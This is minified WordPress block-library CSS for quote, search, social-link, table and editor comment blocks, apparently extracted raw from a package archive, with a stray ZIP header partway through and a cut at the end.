p{font-size:1.5em;font-style:italic;line-height:1.6}.wp-block-quote.is-large:where(:not(.is-style-plain)) cite,.wp-block-quote.is-large:where(:not(.is-style-plain)) footer,.wp-block-quote.is-style-large:where(:not(.is-style-plain)) cite,.wp-block-quote.is-style-large:where(:not(.is-style-plain)) footer{font-size:1.125em;text-align:left}.wp-block-quote>cite{display:block}.wp-block-read-more{display:block;width:fit-content}.wp-block-read-more:where(:not([style*=text-decoration])){text-decoration:none}.wp-block-read-more:where(:not([style*=text-decoration])):active,.wp-block-read-more:where(:not([style*=text-decoration])):focus{text-decoration:none}ul.wp-block-rss.alignleft{margin-right:2em}ul.wp-block-rss.alignright{margin-left:2em}ul.wp-block-rss.is-grid{display:flex;flex-wrap:wrap;padding:0}ul.wp-block-rss.is-grid li{margin:0 0 1em 1em;width:100%}@media (min-width:600px){ul.wp-block-rss.columns-2 li{width:calc(50% - 1em)}ul.wp-block-rss.columns-3 li{width:calc(33.33333% - 1em)}ul.wp-block-rss.columns-4 li{width:calc(25% - 1em)}ul.wp-block-rss.columns-5 li{width:calc(20% - 1em)}ul.wp-block-rss.columns-6 li{width:calc(16.66667% - 1em)}}.wp-block-rss__item-author,.wp-block-rss__item-publish-date{display:block;font-size:.8125em}.wp-block-rss{box-sizing:border-box;list-style:none;padding:0}.wp-block-search__button{margin-right:10px;word-break:normal}.wp-block-search__button.has-icon{line-height:0}.wp-block-search__button svg{height:1.25em;min-height:24px;min-width:24px;width:1.25em;fill:currentColor;vertical-align:text-bottom}:where(.wp-block-search__button){border:1px solid #ccc;padding:6px 10px}.wp-block-search__inside-wrapper{display:flex;flex:auto;flex-wrap:nowrap;max-width:100%}.wp-block-search__label{width:100%}.wp-block-search.wp-block-search__button-only .wp-block-search__button{box-sizing:border-box;display:flex;flex-shrink:0;justify-content:center;margin-right:0;max-width:100%}.wp-block-search.wp-block-search__button-only .wp-block-search__inside-wrapper{min-width:0!important;transition-property:width}.wp-block-search.wp-block-search__button-only .wp-block-search__input{flex-basis:100%;transition-duration:.3s}.wp-block-search.wp-block-search__button-only.wp-block-search__searchfield-hidden,.wp-block-search.wp-block-search__button-only.wp-block-search__searchfield-hidden .wp-block-search__inside-wrapper{overflow:hidden}.wp-block-search.wp-block-search__button-only.wp-block-search__searchfield-hidden .wp-block-search__input{border-left-width:0!important;border-right-width:0!important;flex-basis:0;flex-grow:0;margin:0;min-width:0!important;padding-left:0!important;padding-right:0!important;width:0!important}:where(.wp-block-search__input){appearance:none;border:1px solid #949494;flex-grow:1;font-family:inherit;font-size:inherit;font-style:inherit;font-weight:inherit;letter-spacing:inherit;line-height:inherit;margin-left:0;margin-right:0;min-width:3rem;padding:8px;text-decoration:unset!important;text-transform:inherit}:where(.wp-block-search__button-inside .wp-block-search__inside-wrapper){background-color:#fff;border:1px solid #949494;box-sizing:border-box;padding:4px}:where(.wp-block-search__button-inside .wp-block-search__inside-wrapper) .wp-block-search__input{border:none;border-radius:0;padding:0 4px}:where(.wp-block-search__button-inside .wp-block-search__inside-wrapper) .wp-block-search__input:focus{outline:none}:where(.wp-block-search__button-inside .wp-block-search__inside-wrapper) :where(.wp-block-search__button){padding:4px 8px}.wp-block-search.aligncenter .wp-block-search__inside-wrapper{margin:auto}.wp-block[data-align=right] .wp-block-search.wp-block-search__button-only .wp-block-search__inside-wrapper{float:left}.wp-block-separator{border:none;border-top:2px solid}:root :where(.wp-block-separator.is-style-dots){height:auto;line-height:1;text-align:center}:root :where(.wp-block-separator.is-style-dots):before{color:currentColor;content:"···";font-family:serif;font-size:1.5em;letter-spacing:2em;padding-left:2em}.wp-block-separator.is-style-dots{background:none!important;border:none!important}.wp-block-site-logo{box-sizing:border-box;line-height:0}.wp-block-site-logo a{display:inline-block;line-height:0}.wp-block-site-logo.is-default-size img{height:auto;width:120px}.wp-block-site-logo img{height:auto;max-width:100%}.wp-block-site-logo a,.wp-block-site-logo img{border-radius:inherit}.wp-block-site-logo.aligncenter{margin-left:auto;margin-right:auto;text-align:center}:root :where(.wp-block-site-logo.is-style-rounded){border-radius:9999px}.wp-block-site-tagline,.wp-block-site-title{box-sizing:border-box}.wp-block-site-title :where(a){color:inherit;font-family:inherit;font-size:inherit;font-style:inherit;font-weight:inherit;letter-spacing:inherit;line-height:inherit;text-decoration:inherit}.wp-block-social-links{background:none;box-sizing:border-box;margin-right:0;padding-left:0;padding-right:0;text-indent:0}.wp-block-social-links .wp-social-link a,.wp-block-social-links .wp-social-link a:hover{border-bottom:0;box-shadow:none;text-decoration:none}.wp-block-social-links .wp-social-link svg{height:1em;width:1em}.wp-block-social-links .wp-social-link span:not(.screen-reader-text){font-size:.65em;margin-left:.5em;margin-right:.5em}.wp-block-social-links.has-small-icon-size{font-size:16px}.wp-block-social-links,.wp-block-social-links.has-normal-icon-size{font-size:24px}.wp-block-social-links.has-large-icon-size{font-size:36px}.wp-block-social-links.has-huge-icon-size{font-size:48px}.wp-block-social-links.aligncenter{display:flex;justify-content:center}.wp-block-social-links.alignright{justify-content:flex-end}.wp-block-social-link{border-radius:9999px;display:block}@media not (prefers-reduced-motion){.wp-block-social-link{transition:transform .1s ease}}.wp-block-social-link{height:auto}.wp-block-social-link a{align-items:center;display:flex;line-height:0}.wp-block-social-link:hover{transform:scale(1.1)}.wp-block-social-links .wp-block-social-link.wp-social-link{display:inline-block;margin:0;padding:0}.wp-block-social-links .wp-block-social-link.wp-social-link .wp-block-social-link-anchor,.wp-block-social-links .wp-block-social-link.wp-social-link .wp-block-social-link-anchor svg,.wp-block-social-links .wp-block-social-link.wp-social-link .wp-block-social-link-anchor:active,.wp-block-social-links .wp-block-social-link.wp-social-link .wp-block-social-link-anchor:hover,.wp-block-social-links .wp-block-social-link.wp-social-link .wp-block-social-link-anchor:visited{color:currentColor;fill:currentColor}:where(.wp-block-social-links:not(.is-style-logos-only)) .wp-social-link{background-color:#f0f0f0;color:#444}:where(.wp-block-social-links:not(.is-style-logos-only)) .wp-social-link-amazon{background-color:#f90;color:#fff}:where(.wp-block-social-links:not(.is-style-logos-only)) .wp-social-link-bandcamp{background-color:#1ea0c3;color:#fff}:where(.wp-block-social-links:not(.is-style-logos-only)) .wp-social-link-behance{background-color:#0757fe;color:#fff}:where(.wp-block-social-links:not(.is-style-logos-only)) .wp-social-link-bluesky{background-color:#0a7aff;color:#fff}:where(.wp-block-social-links:not(.is-style-logos-only)) .wp-social-link-codepen{background-color:#1e1f26;color:#fff}:where(.wp-block-social-links:not(.is-style-logos-only)) .wp-social-link-deviantart{background-color:#02e49b;color:#fff}:where(.wp-block-social-links:not(.is-style-logos-only)) .wp-social-link-discord{background-color:#5865f2;color:#fff}:where(.wp-block-social-links:not(.is-style-logos-only)) .wp-social-link-dribbble{background-color:#e94c89;color:#fff}:where(.wp-block-social-links:not(.is-style-logos-only)) .wp-social-link-dropbox{background-color:#4280ff;color:#fff}:where(.wp-block-social-links:not(.is-style-logos-only)) .wp-social-link-etsy{background-color:#f45800;color:#fff}:where(.wp-block-social-links:not(.is-style-logos-only)) .wp-social-link-facebook{background-color:#0866ff;color:#fff}:where(.wp-block-social-links:not(.is-style-logos-only)) .wp-social-link-fivehundredpx{background-color:#000;color:#fff}:where(.wp-block-social-links:not(.is-style-logos-only)) .wp-social-link-flickr{background-color:#0461dd;color:#fff}:where(.wp-block-social-links:not(.is-style-logos-only)) .wp-social-link-foursquare{background-color:#e65678;color:#fff}:where(.wp-block-social-links:not(.is-style-logos-only)) .wp-social-link-github{background-color:#24292d;color:#fff}:where(.wp-block-social-links:not(.is-style-logos-only)) .wp-social-link-goodreads{background-color:#eceadd;color:#382110}:where(.wp-block-social-links:not(.is-style-logos-only)) .wp-social-link-google{background-color:#ea4434;color:#fff}:where(.wp-block-social-links:not(.is-style-logos-only)) .wp-social-link-gravatar{background-color:#1d4fc4;color:#fff}:where(.wp-block-social-links:not(.is-style-logos-only)) .wp-social-link-instagram{background-color:#f00075;color:#fff}:where(.wp-block-social-links:not(.is-style-logos-only)) .wp-social-link-lastfm{background-color:#e21b24;color:#fff}:where(.wp-block-social-links:not(.is-style-logos-only)) .wp-social-link-linkedin{background-color:#0d66c2;color:#fff}:where(.wp-block-social-links:not(.is-style-logos-only)) .wp-social-link-mastodon{background-color:#3288d4;color:#fff}:where(.wp-block-social-links:not(.is-style-logos-only)) .wp-social-link-medium{background-color:#000;color:#fff}:where(.wp-block-social-links:not(.is-style-logos-only)) .wp-social-link-meetup{background-color:#f6405f;color:#fff}:where(.wp-block-social-links:not(.is-style-logos-only)) .wp-social-link-patreon{background-color:#000;color:#fff}:where(.wp-block-social-links:not(.is-style-logos-only)) .wp-social-link-pinterest{background-color:#e60122;color:#fff}:where(.wp-block-social-links:not(.is-style-logos-only)) .wp-social-link-pocket{background-color:#ef4155;color:#fff}:where(.wp-block-social-links:not(.is-style-logos-only)) .wp-social-link-reddit{background-color:#ff4500;color:#fff}:where(.wp-block-social-links:not(.is-style-logos-only)) .wp-social-link-skype{background-color:#0478d7;color:#fff}:where(.wp-block-social-links:not(.is-style-logos-only)) .wp-social-link-snapchat{background-color:#fefc00;color:#fff;stroke:#000}:where(.wp-block-social-links:not(.is-style-logos-only)) .wp-social-link-soundcloud{background-color:#ff5600;color:#fff}:where(.wp-block-social-links:not(.is-style-logos-only)) .wp-social-link-spotify{background-color:#1bd760;color:#fff}:where(.wp-block-social-links:not(.is-style-logos-only)) .wp-social-link-telegram{background-color:#2aabee;color:#fff}:where(.wp-block-social-links:not(.is-style-logos-only)) .wp-social-link-threads{background-color:#000;color:#fff}:where(.wp-block-social-links:not(.is-style-logos-only)) .wp-social-link-tiktok{background-color:#000;color:#fff}:where(.wp-block-social-links:not(.is-style-logos-only)) .wp-social-link-tumblr{background-color:#011835;color:#fff}:where(.wp-block-social-links:not(.is-style-logos-only)) .wp-social-link-twitch{background-color:#6440a4;color:#fff}:where(.wp-block-social-links:not(.is-style-logos-only)) .wp-social-link-twitter{background-color:#1da1f2;color:#fff}:where(.wp-block-social-links:not(.is-style-logos-only)) .wp-social-link-vimeo{background-color:#1eb7ea;color:#fff}:where(.wp-block-social-links:not(.is-style-logos-only)) .wp-social-link-vk{background-color:#4680c2;color:#fff}:where(.wp-block-social-links:not(.is-style-logos-only)) .wp-social-link-wordpress{background-color:#3499cd;color:#fff}:where(.wp-block-social-links:not(.is-style-logos-only)) .wp-social-link-whatsapp{background-color:#25d366;color:#fff}:where(.wp-block-social-links:not(.is-style-logos-only)) .wp-social-link-x{background-color:#000;color:#fff}:where(.wp-block-social-links:not(.is-style-logos-only)) .wp-social-link-yelp{background-color:#d32422;color:#fff}:where(.wp-block-social-links:not(.is-style-logos-only)) .wp-social-link-youtube{background-color:red;color:#fff}:where(.wp-block-social-links.is-style-logos-only) .wp-social-link{background:none}:where(.wp-block-social-links.is-style-logos-only) .wp-social-link svg{height:1.25em;width:1.25em}:where(.wp-block-social-links.is-style-logos-only) .wp-social-link-amazon{color:#f90}:where(.wp-block-social-links.is-style-logos-only) .wp-social-link-bandcamp{color:#1ea0c3}:where(.wp-block-social-links.is-style-logos-only) .wp-social-link-behance{color:#0757fe}:where(.wp-block-social-links.is-style-logos-only) .wp-social-link-bluesky{color:#0a7aff}:where(.wp-block-social-links.is-style-logos-only) .wp-social-link-codepen{color:#1e1f26}:where(.wp-block-social-links.is-style-logos-only) .wp-social-link-deviantart{color:#02e49b}:where(.wp-block-social-links.is-style-logos-only) .wp-social-link-discord{color:#5865f2}:where(.wp-block-social-links.is-style-logos-only) .wp-social-link-dribbble{color:#e94c89}:where(.wp-block-social-links.is-style-logos-only) .wp-social-link-dropbox{color:#4280ff}:where(.wp-block-social-links.is-style-logos-only) .wp-social-link-etsy{color:#f45800}:where(.wp-block-social-links.is-style-logos-only) .wp-social-link-facebook{color:#0866ff}:where(.wp-block-social-links.is-style-logos-only) .wp-social-link-fivehundredpx{color:#000}:where(.wp-block-social-links.is-style-logos-only) .wp-social-link-flickr{color:#0461dd}:where(.wp-block-social-links.is-style-logos-only) .wp-social-link-foursquare{color:#e65678}:where(.wp-block-social-links.is-style-logos-only) .wp-social-link-github{color:#24292d}:where(.wp-block-social-links.is-style-logos-only) .wp-social-link-goodreads{color:#382110}:where(.wp-block-social-links.is-style-logos-only) .wp-social-link-google{color:#ea4434}:where(.wp-block-social-links.is-style-logos-only) .wp-social-link-gravatar{color:#1d4fc4}:where(.wp-block-social-links.is-style-logos-only) .wp-social-link-instagram{color:#f00075}:where(.wp-block-social-links.is-style-logos-only) .wp-social-link-lastfm{color:#e21b24}:where(.wp-block-social-links.is-style-logos-only) .wp-social-link-linkedin{color:#0d66c2}:where(.wp-block-social-links.is-style-logos-only) .wp-social-link-mastodon{color:#3288d4}:where(.wp-block-social-links.is-style-logos-only) .wp-social-link-medium{color:#000}:where(.wp-block-social-links.is-style-logos-only) .wp-social-link-meetup{color:#f6405f}:where(.wp-block-social-links.is-style-logos-only) .wp-social-link-patreon{color:#000}:where(.wp-block-social-links.is-style-logos-only) .wp-social-link-pinterest{color:#e60122}:where(.wp-block-social-links.is-style-logos-only) .wp-social-link-pocket{color:#ef4155}:where(.wp-block-social-links.is-style-logos-only) .wp-social-link-reddit{color:#ff4500}:where(.wp-block-social-links.is-style-logos-only) .wp-social-link-skype{color:#0478d7}:where(.wp-block-social-links.is-style-logos-only) .wp-social-link-snapchat{color:#fff;stroke:#000}:where(.wp-block-social-links.is-style-logos-only) .wp-social-link-soundcloud{color:#ff5600}:where(.wp-block-social-links.is-style-logos-only) .wp-social-link-spotify{color:#1bd760}:where(.wp-block-social-links.is-style-logos-only) .wp-social-link-telegram{color:#2aabee}:where(.wp-block-social-links.is-style-logos-only) .wp-social-link-threads{color:#000}:where(.wp-block-social-links.is-style-logos-only) .wp-social-link-tiktok{color:#000}:where(.wp-block-social-links.is-style-logos-only) .wp-social-link-tumblr{color:#011835}:where(.wp-block-social-links.is-style-logos-only) .wp-social-link-twitch{color:#6440a4}:where(.wp-block-social-links.is-style-logos-only) .wp-social-link-twitter{color:#1da1f2}:where(.wp-block-social-links.is-style-logos-only) .wp-social-link-vimeo{color:#1eb7ea}:where(.wp-block-social-links.is-style-logos-only) .wp-social-link-vk{color:#4680c2}:where(.wp-block-social-links.is-style-logos-only) .wp-social-link-whatsapp{color:#25d366}:where(.wp-block-social-links.is-style-logos-only) .wp-social-link-wordpress{color:#3499cd}:where(.wp-block-social-links.is-style-logos-only) .wp-social-link-x{color:#000}:where(.wp-block-social-links.is-style-logos-only) .wp-social-link-yelp{color:#d32422}:where(.wp-block-social-links.is-style-logos-only) .wp-social-link-youtube{color:red}.wp-block-social-links.is-style-pill-shape .wp-social-link{width:auto}:root :where(.wp-block-social-links .wp-social-link a){padding:.25em}:root :where(.wp-block-social-links.is-style-logos-only .wp-social-link a){padding:0}:root :where(.wp-block-social-links.is-style-pill-shape .wp-social-link a){padding-left:.6666666667em;padding-right:.6666666667em}.wp-block-social-links:not(.has-icon-color):not(.has-icon-background-color) .wp-social-link-snapchat .wp-block-social-link-label{color:#000}.wp-block-spacer{clear:both}.wp-block-tag-cloud{box-sizing:border-box}.wp-block-tag-cloud.aligncenter{justify-content:center;text-align:center}.wp-block-tag-cloud a{display:inline-block;margin-left:5px}.wp-block-tag-cloud span{display:inline-block;margin-right:5px;text-decoration:none}:root :where(.wp-block-tag-cloud.is-style-outline){display:flex;flex-wrap:wrap;gap:1ch}:root :where(.wp-block-tag-cloud.is-style-outline a){border:1px solid;font-size:unset!important;margin-left:0;padding:1ch 2ch;text-decoration:none!important}.wp-block-table{overflow-x:auto}.wp-block-table table{border-collapse:collapse;width:100%}.wp-block-table thead{border-bottom:3px solid}.wp-block-table tfoot{border-top:3px solid}.wp-block-table td,.wp-block-table th{border:1px solid;padding:.5em}.wp-block-table .has-fixed-layout{table-layout:fixed;width:100%}.wp-block-table .has-fixed-layout td,.wp-block-table .has-fixed-layout th{word-break:break-word}.wp-block-table.aligncenter,.wp-block-table.alignleft,.wp-block-table.alignright{display:table;width:auto}.wp-block-table.aligncenter td,.wp-block-table.aligncenter th,.wp-block-table.alignleft td,.wp-block-table.alignleft th,.wp-block-table.alignright td,.wp-block-table.alignright th{word-break:break-word}.wp-block-table .has-subtle-light-gray-background-color{background-color:#f3f4f5}.wp-block-table .has-subtle-pale-green-background-color{background-color:#e9fbe5}.wp-block-table .has-subtle-pale-blue-background-color{background-color:#e7f5fe}.wp-block-table .has-subtle-pale-pink-background-color{background-color:#fcf0ef}.wp-block-table.is-style-stripes{background-color:initial;border-collapse:inherit;border-spacing:0}.wp-block-table.is-style-stripes tbody tr:nth-child(odd){background-color:#f0f0f0}.wp-block-table.is-style-stripes.has-subtle-light-gray-background-color tbody tr:nth-child(odd){background-color:#f3f4f5}.wp-block-table.is-style-stripes.has-subtle-pale-green-background-color tbody tr:nth-child(odd){background-color:#e9fbe5}.wp-block-table.is-style-stripes.has-subtle-pale-blue-background-color tbody tr:nth-child(odd){background-color:#e7f5fe}.wp-block-table.is-style-stripes.has-subtle-pale-pink-background-color tbody tr:nth-child(odd){background-color:#fcf0ef}.wp-block-table.is-style-stripes td,.wp-block-table.is-style-stripes th{border-color:#0000}.wp-block-table.is-style-stripes{border-bottom:1px solid #f0f0f0}.wp-block-table .has-border-color td,.wp-block-table .has-border-color th,.wp-block-table .has-border-color tr,.wp-block-table .has-border-color>*{border-color:inherit}.wp-block-table table[style*=border-top-color] tr:first-child,.wp-block-table table[style*=border-top-color] tr:first-child td,.wp-block-table table[style*=border-top-color] tr:first-child th,.wp-block-table table[style*=border-top-color]>*,.wp-block-table table[style*=border-top-color]>* td,.wp-block-table table[style*=border-top-color]>* th{border-top-color:inherit}.wp-block-table table[style*=border-top-color] tr:not(:first-child){border-top-color:initial}.wp-block-table table[style*=border-right-color] td:last-child,.wp-block-table table[style*=border-right-color] th,.wp-block-table table[style*=border-right-color] tr,.wp-block-table table[style*=border-right-color]>*{border-left-color:inherit}.wp-block-table table[style*=border-bottom-color] tr:last-child,.wp-block-table table[style*=border-bottom-color] tr:last-child td,.wp-block-table table[style*=border-bottom-color] tr:last-child th,.wp-block-table table[style*=border-bottom-color]>*,.wp-block-table table[style*=border-bottom-color]>* td,.wp-block-table table[style*=border-bottom-color]>* th{border-bottom-color:inherit}.wp-block-table table[style*=border-bottom-color] tr:not(:last-child){border-bottom-color:initial}.wp-block-table table[style*=border-left-color] td:first-child,.wp-block-table table[style*=border-left-color] th,.wp-block-table table[style*=border-left-color] tr,.wp-block-table table[style*=border-left-color]>*{border-right-color:inherit}.wp-block-table table[style*=border-style] td,.wp-block-table table[style*=border-style] th,.wp-block-table table[style*=border-style] tr,.wp-block-table table[style*=border-style]>*{border-style:inherit}.wp-block-table table[style*=border-width] td,.wp-block-table table[style*=border-width] th,.wp-block-table table[style*=border-width] tr,.wp-block-table table[style*=border-width]>*{border-style:inherit;border-width:inherit}:root :where(.wp-block-table-of-contents){box-sizing:border-box}.wp-block-term-count{box-sizing:border-box}:where(.wp-block-term-description){box-sizing:border-box;margin-bottom:var(--wp--style--block-gap);margin-top:var(--wp--style--block-gap)}.wp-block-term-description p{margin-bottom:0;margin-top:0}.wp-block-term-name{box-sizing:border-box}.wp-block-term-template{box-sizing:border-box;list-style:none;margin-bottom:0;margin-top:0;max-width:100%;padding:0}.wp-block-text-columns,.wp-block-text-columns.aligncenter{display:flex}.wp-block-text-columns .wp-block-column{margin:0 1em;padding:0}.wp-block-text-columns .wp-block-column:first-child{margin-right:0}.wp-block-text-columns .wp-block-column:last-child{margin-left:0}.wp-block-text-columns.columns-2 .wp-block-column{width:50%}.wp-block-text-columns.columns-3 .wp-block-column{width:33.3333333333%}.wp-block-text-columns.columns-4 .wp-block-column{width:25%}pre.wp-block-verse{overflow:auto;white-space:pre-wrap}:where(pre.wp-block-verse){font-family:inherit}.wp-block-video{box-sizing:border-box}.wp-block-video video{height:auto;vertical-align:middle;width:100%}@supports (position:sticky){.wp-block-video [poster]{object-fit:cover}}.wp-block-video.aligncenter{text-align:center}.wp-block-video :where(figcaption){margin-bottom:1em;margin-top:.5em}.editor-styles-wrapper,.entry-content{counter-reset:footnotes}a[data-fn].fn{counter-increment:footnotes;display:inline-flex;font-size:smaller;text-decoration:none;text-indent:-9999999px;vertical-align:super}a[data-fn].fn:after{content:"[" counter(footnotes) "]";float:right;text-indent:0}:root{--wp-block-synced-color:#7a00df;--wp-block-synced-color--rgb:122,0,223;--wp-bound-block-color:var(--wp-block-synced-color);--wp-editor-canvas-background:#ddd;--wp-admin-theme-color:#007cba;--wp-admin-theme-color--rgb:0,124,186;--wp-admin-theme-color-darker-10:#006ba1;--wp-admin-theme-color-darker-10--rgb:0,107,160.5;--wp-admin-theme-color-darker-20:#005a87;--wp-admin-theme-color-darker-20--rgb:0,90,135;--wp-admin-border-width-focus:2px}@media (min-resolution:192dpi){:root{--wp-admin-border-width-focus:1.5px}}.wp-element-button{cursor:pointer}:root .has-very-light-gray-background-color{background-color:#eee}:root .has-very-dark-gray-background-color{background-color:#313131}:root .has-very-light-gray-color{color:#eee}:root .has-very-dark-gray-color{color:#313131}:root .has-vivid-green-cyan-to-vivid-cyan-blue-gradient-background{background:linear-gradient(-135deg,#00d084,#0693e3)}:root .has-purple-crush-gradient-background{background:linear-gradient(-135deg,#34e2e4,#4721fb 50%,#ab1dfe)}:root .has-hazy-dawn-gradient-background{background:linear-gradient(-135deg,#faaca8,#dad0ec)}:root .has-subdued-olive-gradient-background{background:linear-gradient(-135deg,#fafae1,#67a671)}:root .has-atomic-cream-gradient-background{background:linear-gradient(-135deg,#fdd79a,#004a59)}:root .has-nightshade-gradient-background{background:linear-gradient(-135deg,#330968,#31cdcf)}:root .has-midnight-gradient-background{background:linear-gradient(-135deg,#020381,#2874fc)}:root{--wp--preset--font-size--normal:16px;--wp--preset--font-size--huge:42px}.has-regular-font-size{font-size:1em}.has-larger-font-size{font-size:2.625em}.has-normal-font-size{font-size:var(--wp--preset--font-size--normal)}.has-huge-font-size{font-size:var(--wp--preset--font-size--huge)}.has-text-align-center{text-align:center}.has-text-align-left{text-align:left}.has-text-align-right{text-align:right}.has-fit-text{white-space:nowrap!important}#end-resizable-editor-section{display:none}.aligncenter{clear:both}.items-justified-left{justify-content:flex-start}.items-justified-center{justify-content:center}.items-justified-right{justify-content:flex-end}.items-justified-space-between{justify-content:space-between}.screen-reader-text{border:0;clip-path:inset(50%);height:1px;margin:-1px;overflow:hidden;padding:0;position:absolute;width:1px;word-wrap:normal!important}.screen-reader-text:focus{background-color:#ddd;clip-path:none;color:#444;display:block;font-size:1em;height:auto;line-height:normal;padding:15px 23px 14px;right:5px;text-decoration:none;top:5px;width:auto;z-index:100000}html :where(.has-border-color){border-style:solid}html :where([style*=border-top-color]){border-top-style:solid}html :where([style*=border-right-color]){border-left-style:solid}html :where([style*=border-bottom-color]){border-bottom-style:solid}html :where([style*=border-left-color]){border-right-style:solid}html :where([style*=border-width]){border-style:solid}html :where([style*=border-top-width]){border-top-style:solid}html :where([style*=border-right-width]){border-left-style:solid}html :where([style*=border-bottom-width]){border-bottom-style:solid}html :where([style*=border-left-width]){border-right-style:solid}html :where(img[class*=wp-image-]){height:auto;max-width:100%}:where(figure){margin:0 0 1em}html :where(.is-position-sticky){--wp-admin--admin-bar--position-offset:var(--wp-admin--admin-bar--height,0px)}@media screen and (max-width:600px){html :where(.is-position-sticky){--wp-admin--admin-bar--position-offset:0px}}PK!{ņss%dist/block-library/editor-rtl.min.cssnuȯ.wp-block-archives .wp-block-archives{border:0;margin:0}.wp-block-audio{margin-left:0;margin-right:0;position:relative}.wp-block-audio.is-transient audio{opacity:.3}.wp-block-audio .components-spinner{margin-right:-9px;margin-top:-9px;position:absolute;right:50%;top:50%}.wp-block-avatar__image img{width:100%}.wp-block-avatar.aligncenter .components-resizable-box__container{margin:0 auto}.wp-block[data-align=center]>.wp-block-button{margin-left:auto;margin-right:auto;text-align:center}.wp-block[data-align=right]>.wp-block-button{text-align:right}.wp-block-button{cursor:text;position:relative}.wp-block-button:focus{box-shadow:0 0 0 1px #fff,0 0 0 3px var(--wp-admin-theme-color);outline:2px solid #0000;outline-offset:-2px}.wp-block-button[data-rich-text-placeholder]:after{opacity:.8}div[data-type="core/button"]{display:table}.wp-block-buttons>.wp-block,.wp-block-buttons>.wp-block-button.wp-block-button.wp-block-button.wp-block-button.wp-block-button{margin:0}.wp-block-buttons>.block-list-appender{align-items:center;display:inline-flex}.wp-block-buttons.is-vertical>.block-list-appender .block-list-appender__toggle{justify-content:flex-start}.wp-block-buttons>.wp-block-button:focus{box-shadow:none}.wp-block-buttons:not(.is-content-justification-space-between,.is-content-justification-right,.is-content-justification-left,.is-content-justification-center) .wp-block[data-align=center]{margin-left:auto;margin-right:auto;margin-top:0;width:100%}.wp-block-buttons:not(.is-content-justification-space-between,.is-content-justification-right,.is-content-justification-left,.is-content-justification-center) .wp-block[data-align=center] .wp-block-button{margin-bottom:0}.wp-block[data-align=center]>.wp-block-buttons{align-items:center;justify-content:center}.wp-block[data-align=right]>.wp-block-buttons{justify-content:flex-end}.wp-block-categories ul{padding-right:2.5em}.wp-block-categories ul ul{margin-top:6px}[data-align=center] .wp-block-categories{text-align:center}.wp-block-categories__indentation{padding-right:16px}.wp-block-code code{background:none}.wp-block-columns :where(.wp-block){margin-left:0;margin-right:0;max-width:none}html :where(.wp-block-column){margin-bottom:0;margin-top:0}.wp-block-comments__legacy-placeholder,.wp-block-post-comments{box-sizing:border-box}.wp-block-comments__legacy-placeholder .alignleft,.wp-block-post-comments .alignleft{float:right}.wp-block-comments__legacy-placeholder .alignright,.wp-block-post-comments .alignright{float:left}.wp-block-comments__legacy-placeholder .navigation:after,.wp-block-post-comments .navigation:after{clear:both;content:"";display:table}.wp-block-comments__legacy-placeholder .commentlist,.wp-block-post-comments .commentlist{clear:both;list-style:none;margin:0;padding:0}.wp-block-comments__legacy-placeholder .commentlist .comment,.wp-block-post-comments .commentlist .comment{min-height:2.25em;padding-right:3.25em}.wp-block-comments__legacy-placeholder .commentlist .comment p,.wp-block-post-comments .commentlist .comment p{font-size:1em;line-height:1.8;margin:1em 0}.wp-block-comments__legacy-placeholder .commentlist .children,.wp-block-post-comments .commentlist .children{list-style:none;margin:0;padding:0}.wp-block-comments__legacy-placeholder .comment-author,.wp-block-post-comments .comment-author{line-height:1.5}.wp-block-comments__legacy-placeholder .comment-author .avatar,.wp-block-post-comments .comment-author .avatar{border-radius:1.5em;display:block;float:right;height:2.5em;margin-left:.75em;margin-top:.5em;width:2.5em}.wp-block-comments__legacy-placeholder .comment-author cite,.wp-block-post-comments .comment-author cite{font-style:normal}.wp-block-comments__legacy-placeholder .comment-meta,.wp-block-post-comments .comment-meta{font-size:.875em;line-height:1.5}.wp-block-comments__legacy-placeholder .comment-meta b,.wp-block-post-comments .comment-meta b{font-weight:400}.wp-block-comments__legacy-placeholder .comment-meta .comment-awaiting-moderation,.wp-block-post-comments .comment-meta .comment-awaiting-moderation{display:block;margin-bottom:1em;margin-top:1em}.wp-block-comments__legacy-placeholder .comment-body .commentmetadata,.wp-block-post-comments .comment-body .commentmetadata{font-size:.875em}.wp-block-comments__legacy-placeholder .comment-form-author label,.wp-block-comments__legacy-placeholder .comment-form-comment label,.wp-block-comments__legacy-placeholder .comment-form-email label,.wp-block-comments__legacy-placeholder .comment-form-url label,.wp-block-post-comments .comment-form-author label,.wp-block-post-comments .comment-form-comment label,.wp-block-post-comments .comment-form-email label,.wp-block-post-comments .comment-form-url label{display:block;margin-bottom:.25em}.wp-block-comments__legacy-placeholder .comment-form input:not([type=submit]):not([type=checkbox]),.wp-block-comments__legacy-placeholder .comment-form textarea,.wp-block-post-comments .comment-form input:not([type=submit]):not([type=checkbox]),.wp-block-post-comments .comment-form textarea{box-sizing:border-box;display:block;width:100%}.wp-block-comments__legacy-placeholder .comment-form-cookies-consent,.wp-block-post-comments .comment-form-cookies-consent{display:flex;gap:.25em}.wp-block-comments__legacy-placeholder .comment-form-cookies-consent #wp-comment-cookies-consent,.wp-block-post-comments .comment-form-cookies-consent #wp-comment-cookies-consent{margin-top:.35em}.wp-block-comments__legacy-placeholder .comment-reply-title,.wp-block-post-comments .comment-reply-title{margin-bottom:0}.wp-block-comments__legacy-placeholder .comment-reply-title :where(small),.wp-block-post-comments .comment-reply-title :where(small){font-size:var(--wp--preset--font-size--medium,smaller);margin-right:.5em}.wp-block-comments__legacy-placeholder .reply,.wp-block-post-comments .reply{font-size:.875em;margin-bottom:1.4em}.wp-block-comments__legacy-placeholder input:not([type=submit]),.wp-block-comments__legacy-placeholder textarea,.wp-block-post-comments input:not([type=submit]),.wp-block-post-comments textarea{border:1px solid #949494;font-family:inherit;font-size:1em}.wp-block-comments__legacy-placeholder input:not([type=submit]):not([type=checkbox]),.wp-block-comments__legacy-placeholder textarea,.wp-block-post-comments input:not([type=submit]):not([type=checkbox]),.wp-block-post-comments textarea{padding:calc(.667em + 2px)}:where(.wp-block-post-comments input[type=submit],.wp-block-comments__legacy-placeholder input[type=submit]){border:none}.wp-block-comments{box-sizing:border-box}.block-library-comments-toolbar__popover .components-popover__content{min-width:230px}.wp-block-comments__legacy-placeholder *{pointer-events:none}.wp-block-comment-author-avatar__placeholder{border:1px dashed;height:100%;width:100%;stroke:currentColor;stroke-dasharray:3}.wp-block[data-align=center]>.wp-block-comments-pagination{justify-content:center}:where(.editor-styles-wrapper) .wp-block-comments-pagination{max-width:100%}.wp-block-comments-pagination>.wp-block-comments-pagination-next,.wp-block-comments-pagination>.wp-block-comments-pagination-numbers,.wp-block-comments-pagination>.wp-block-comments-pagination-previous{font-size:inherit}.wp-block-comments-pagination-numbers a{text-decoration:underline}.wp-block-comments-pagination-numbers 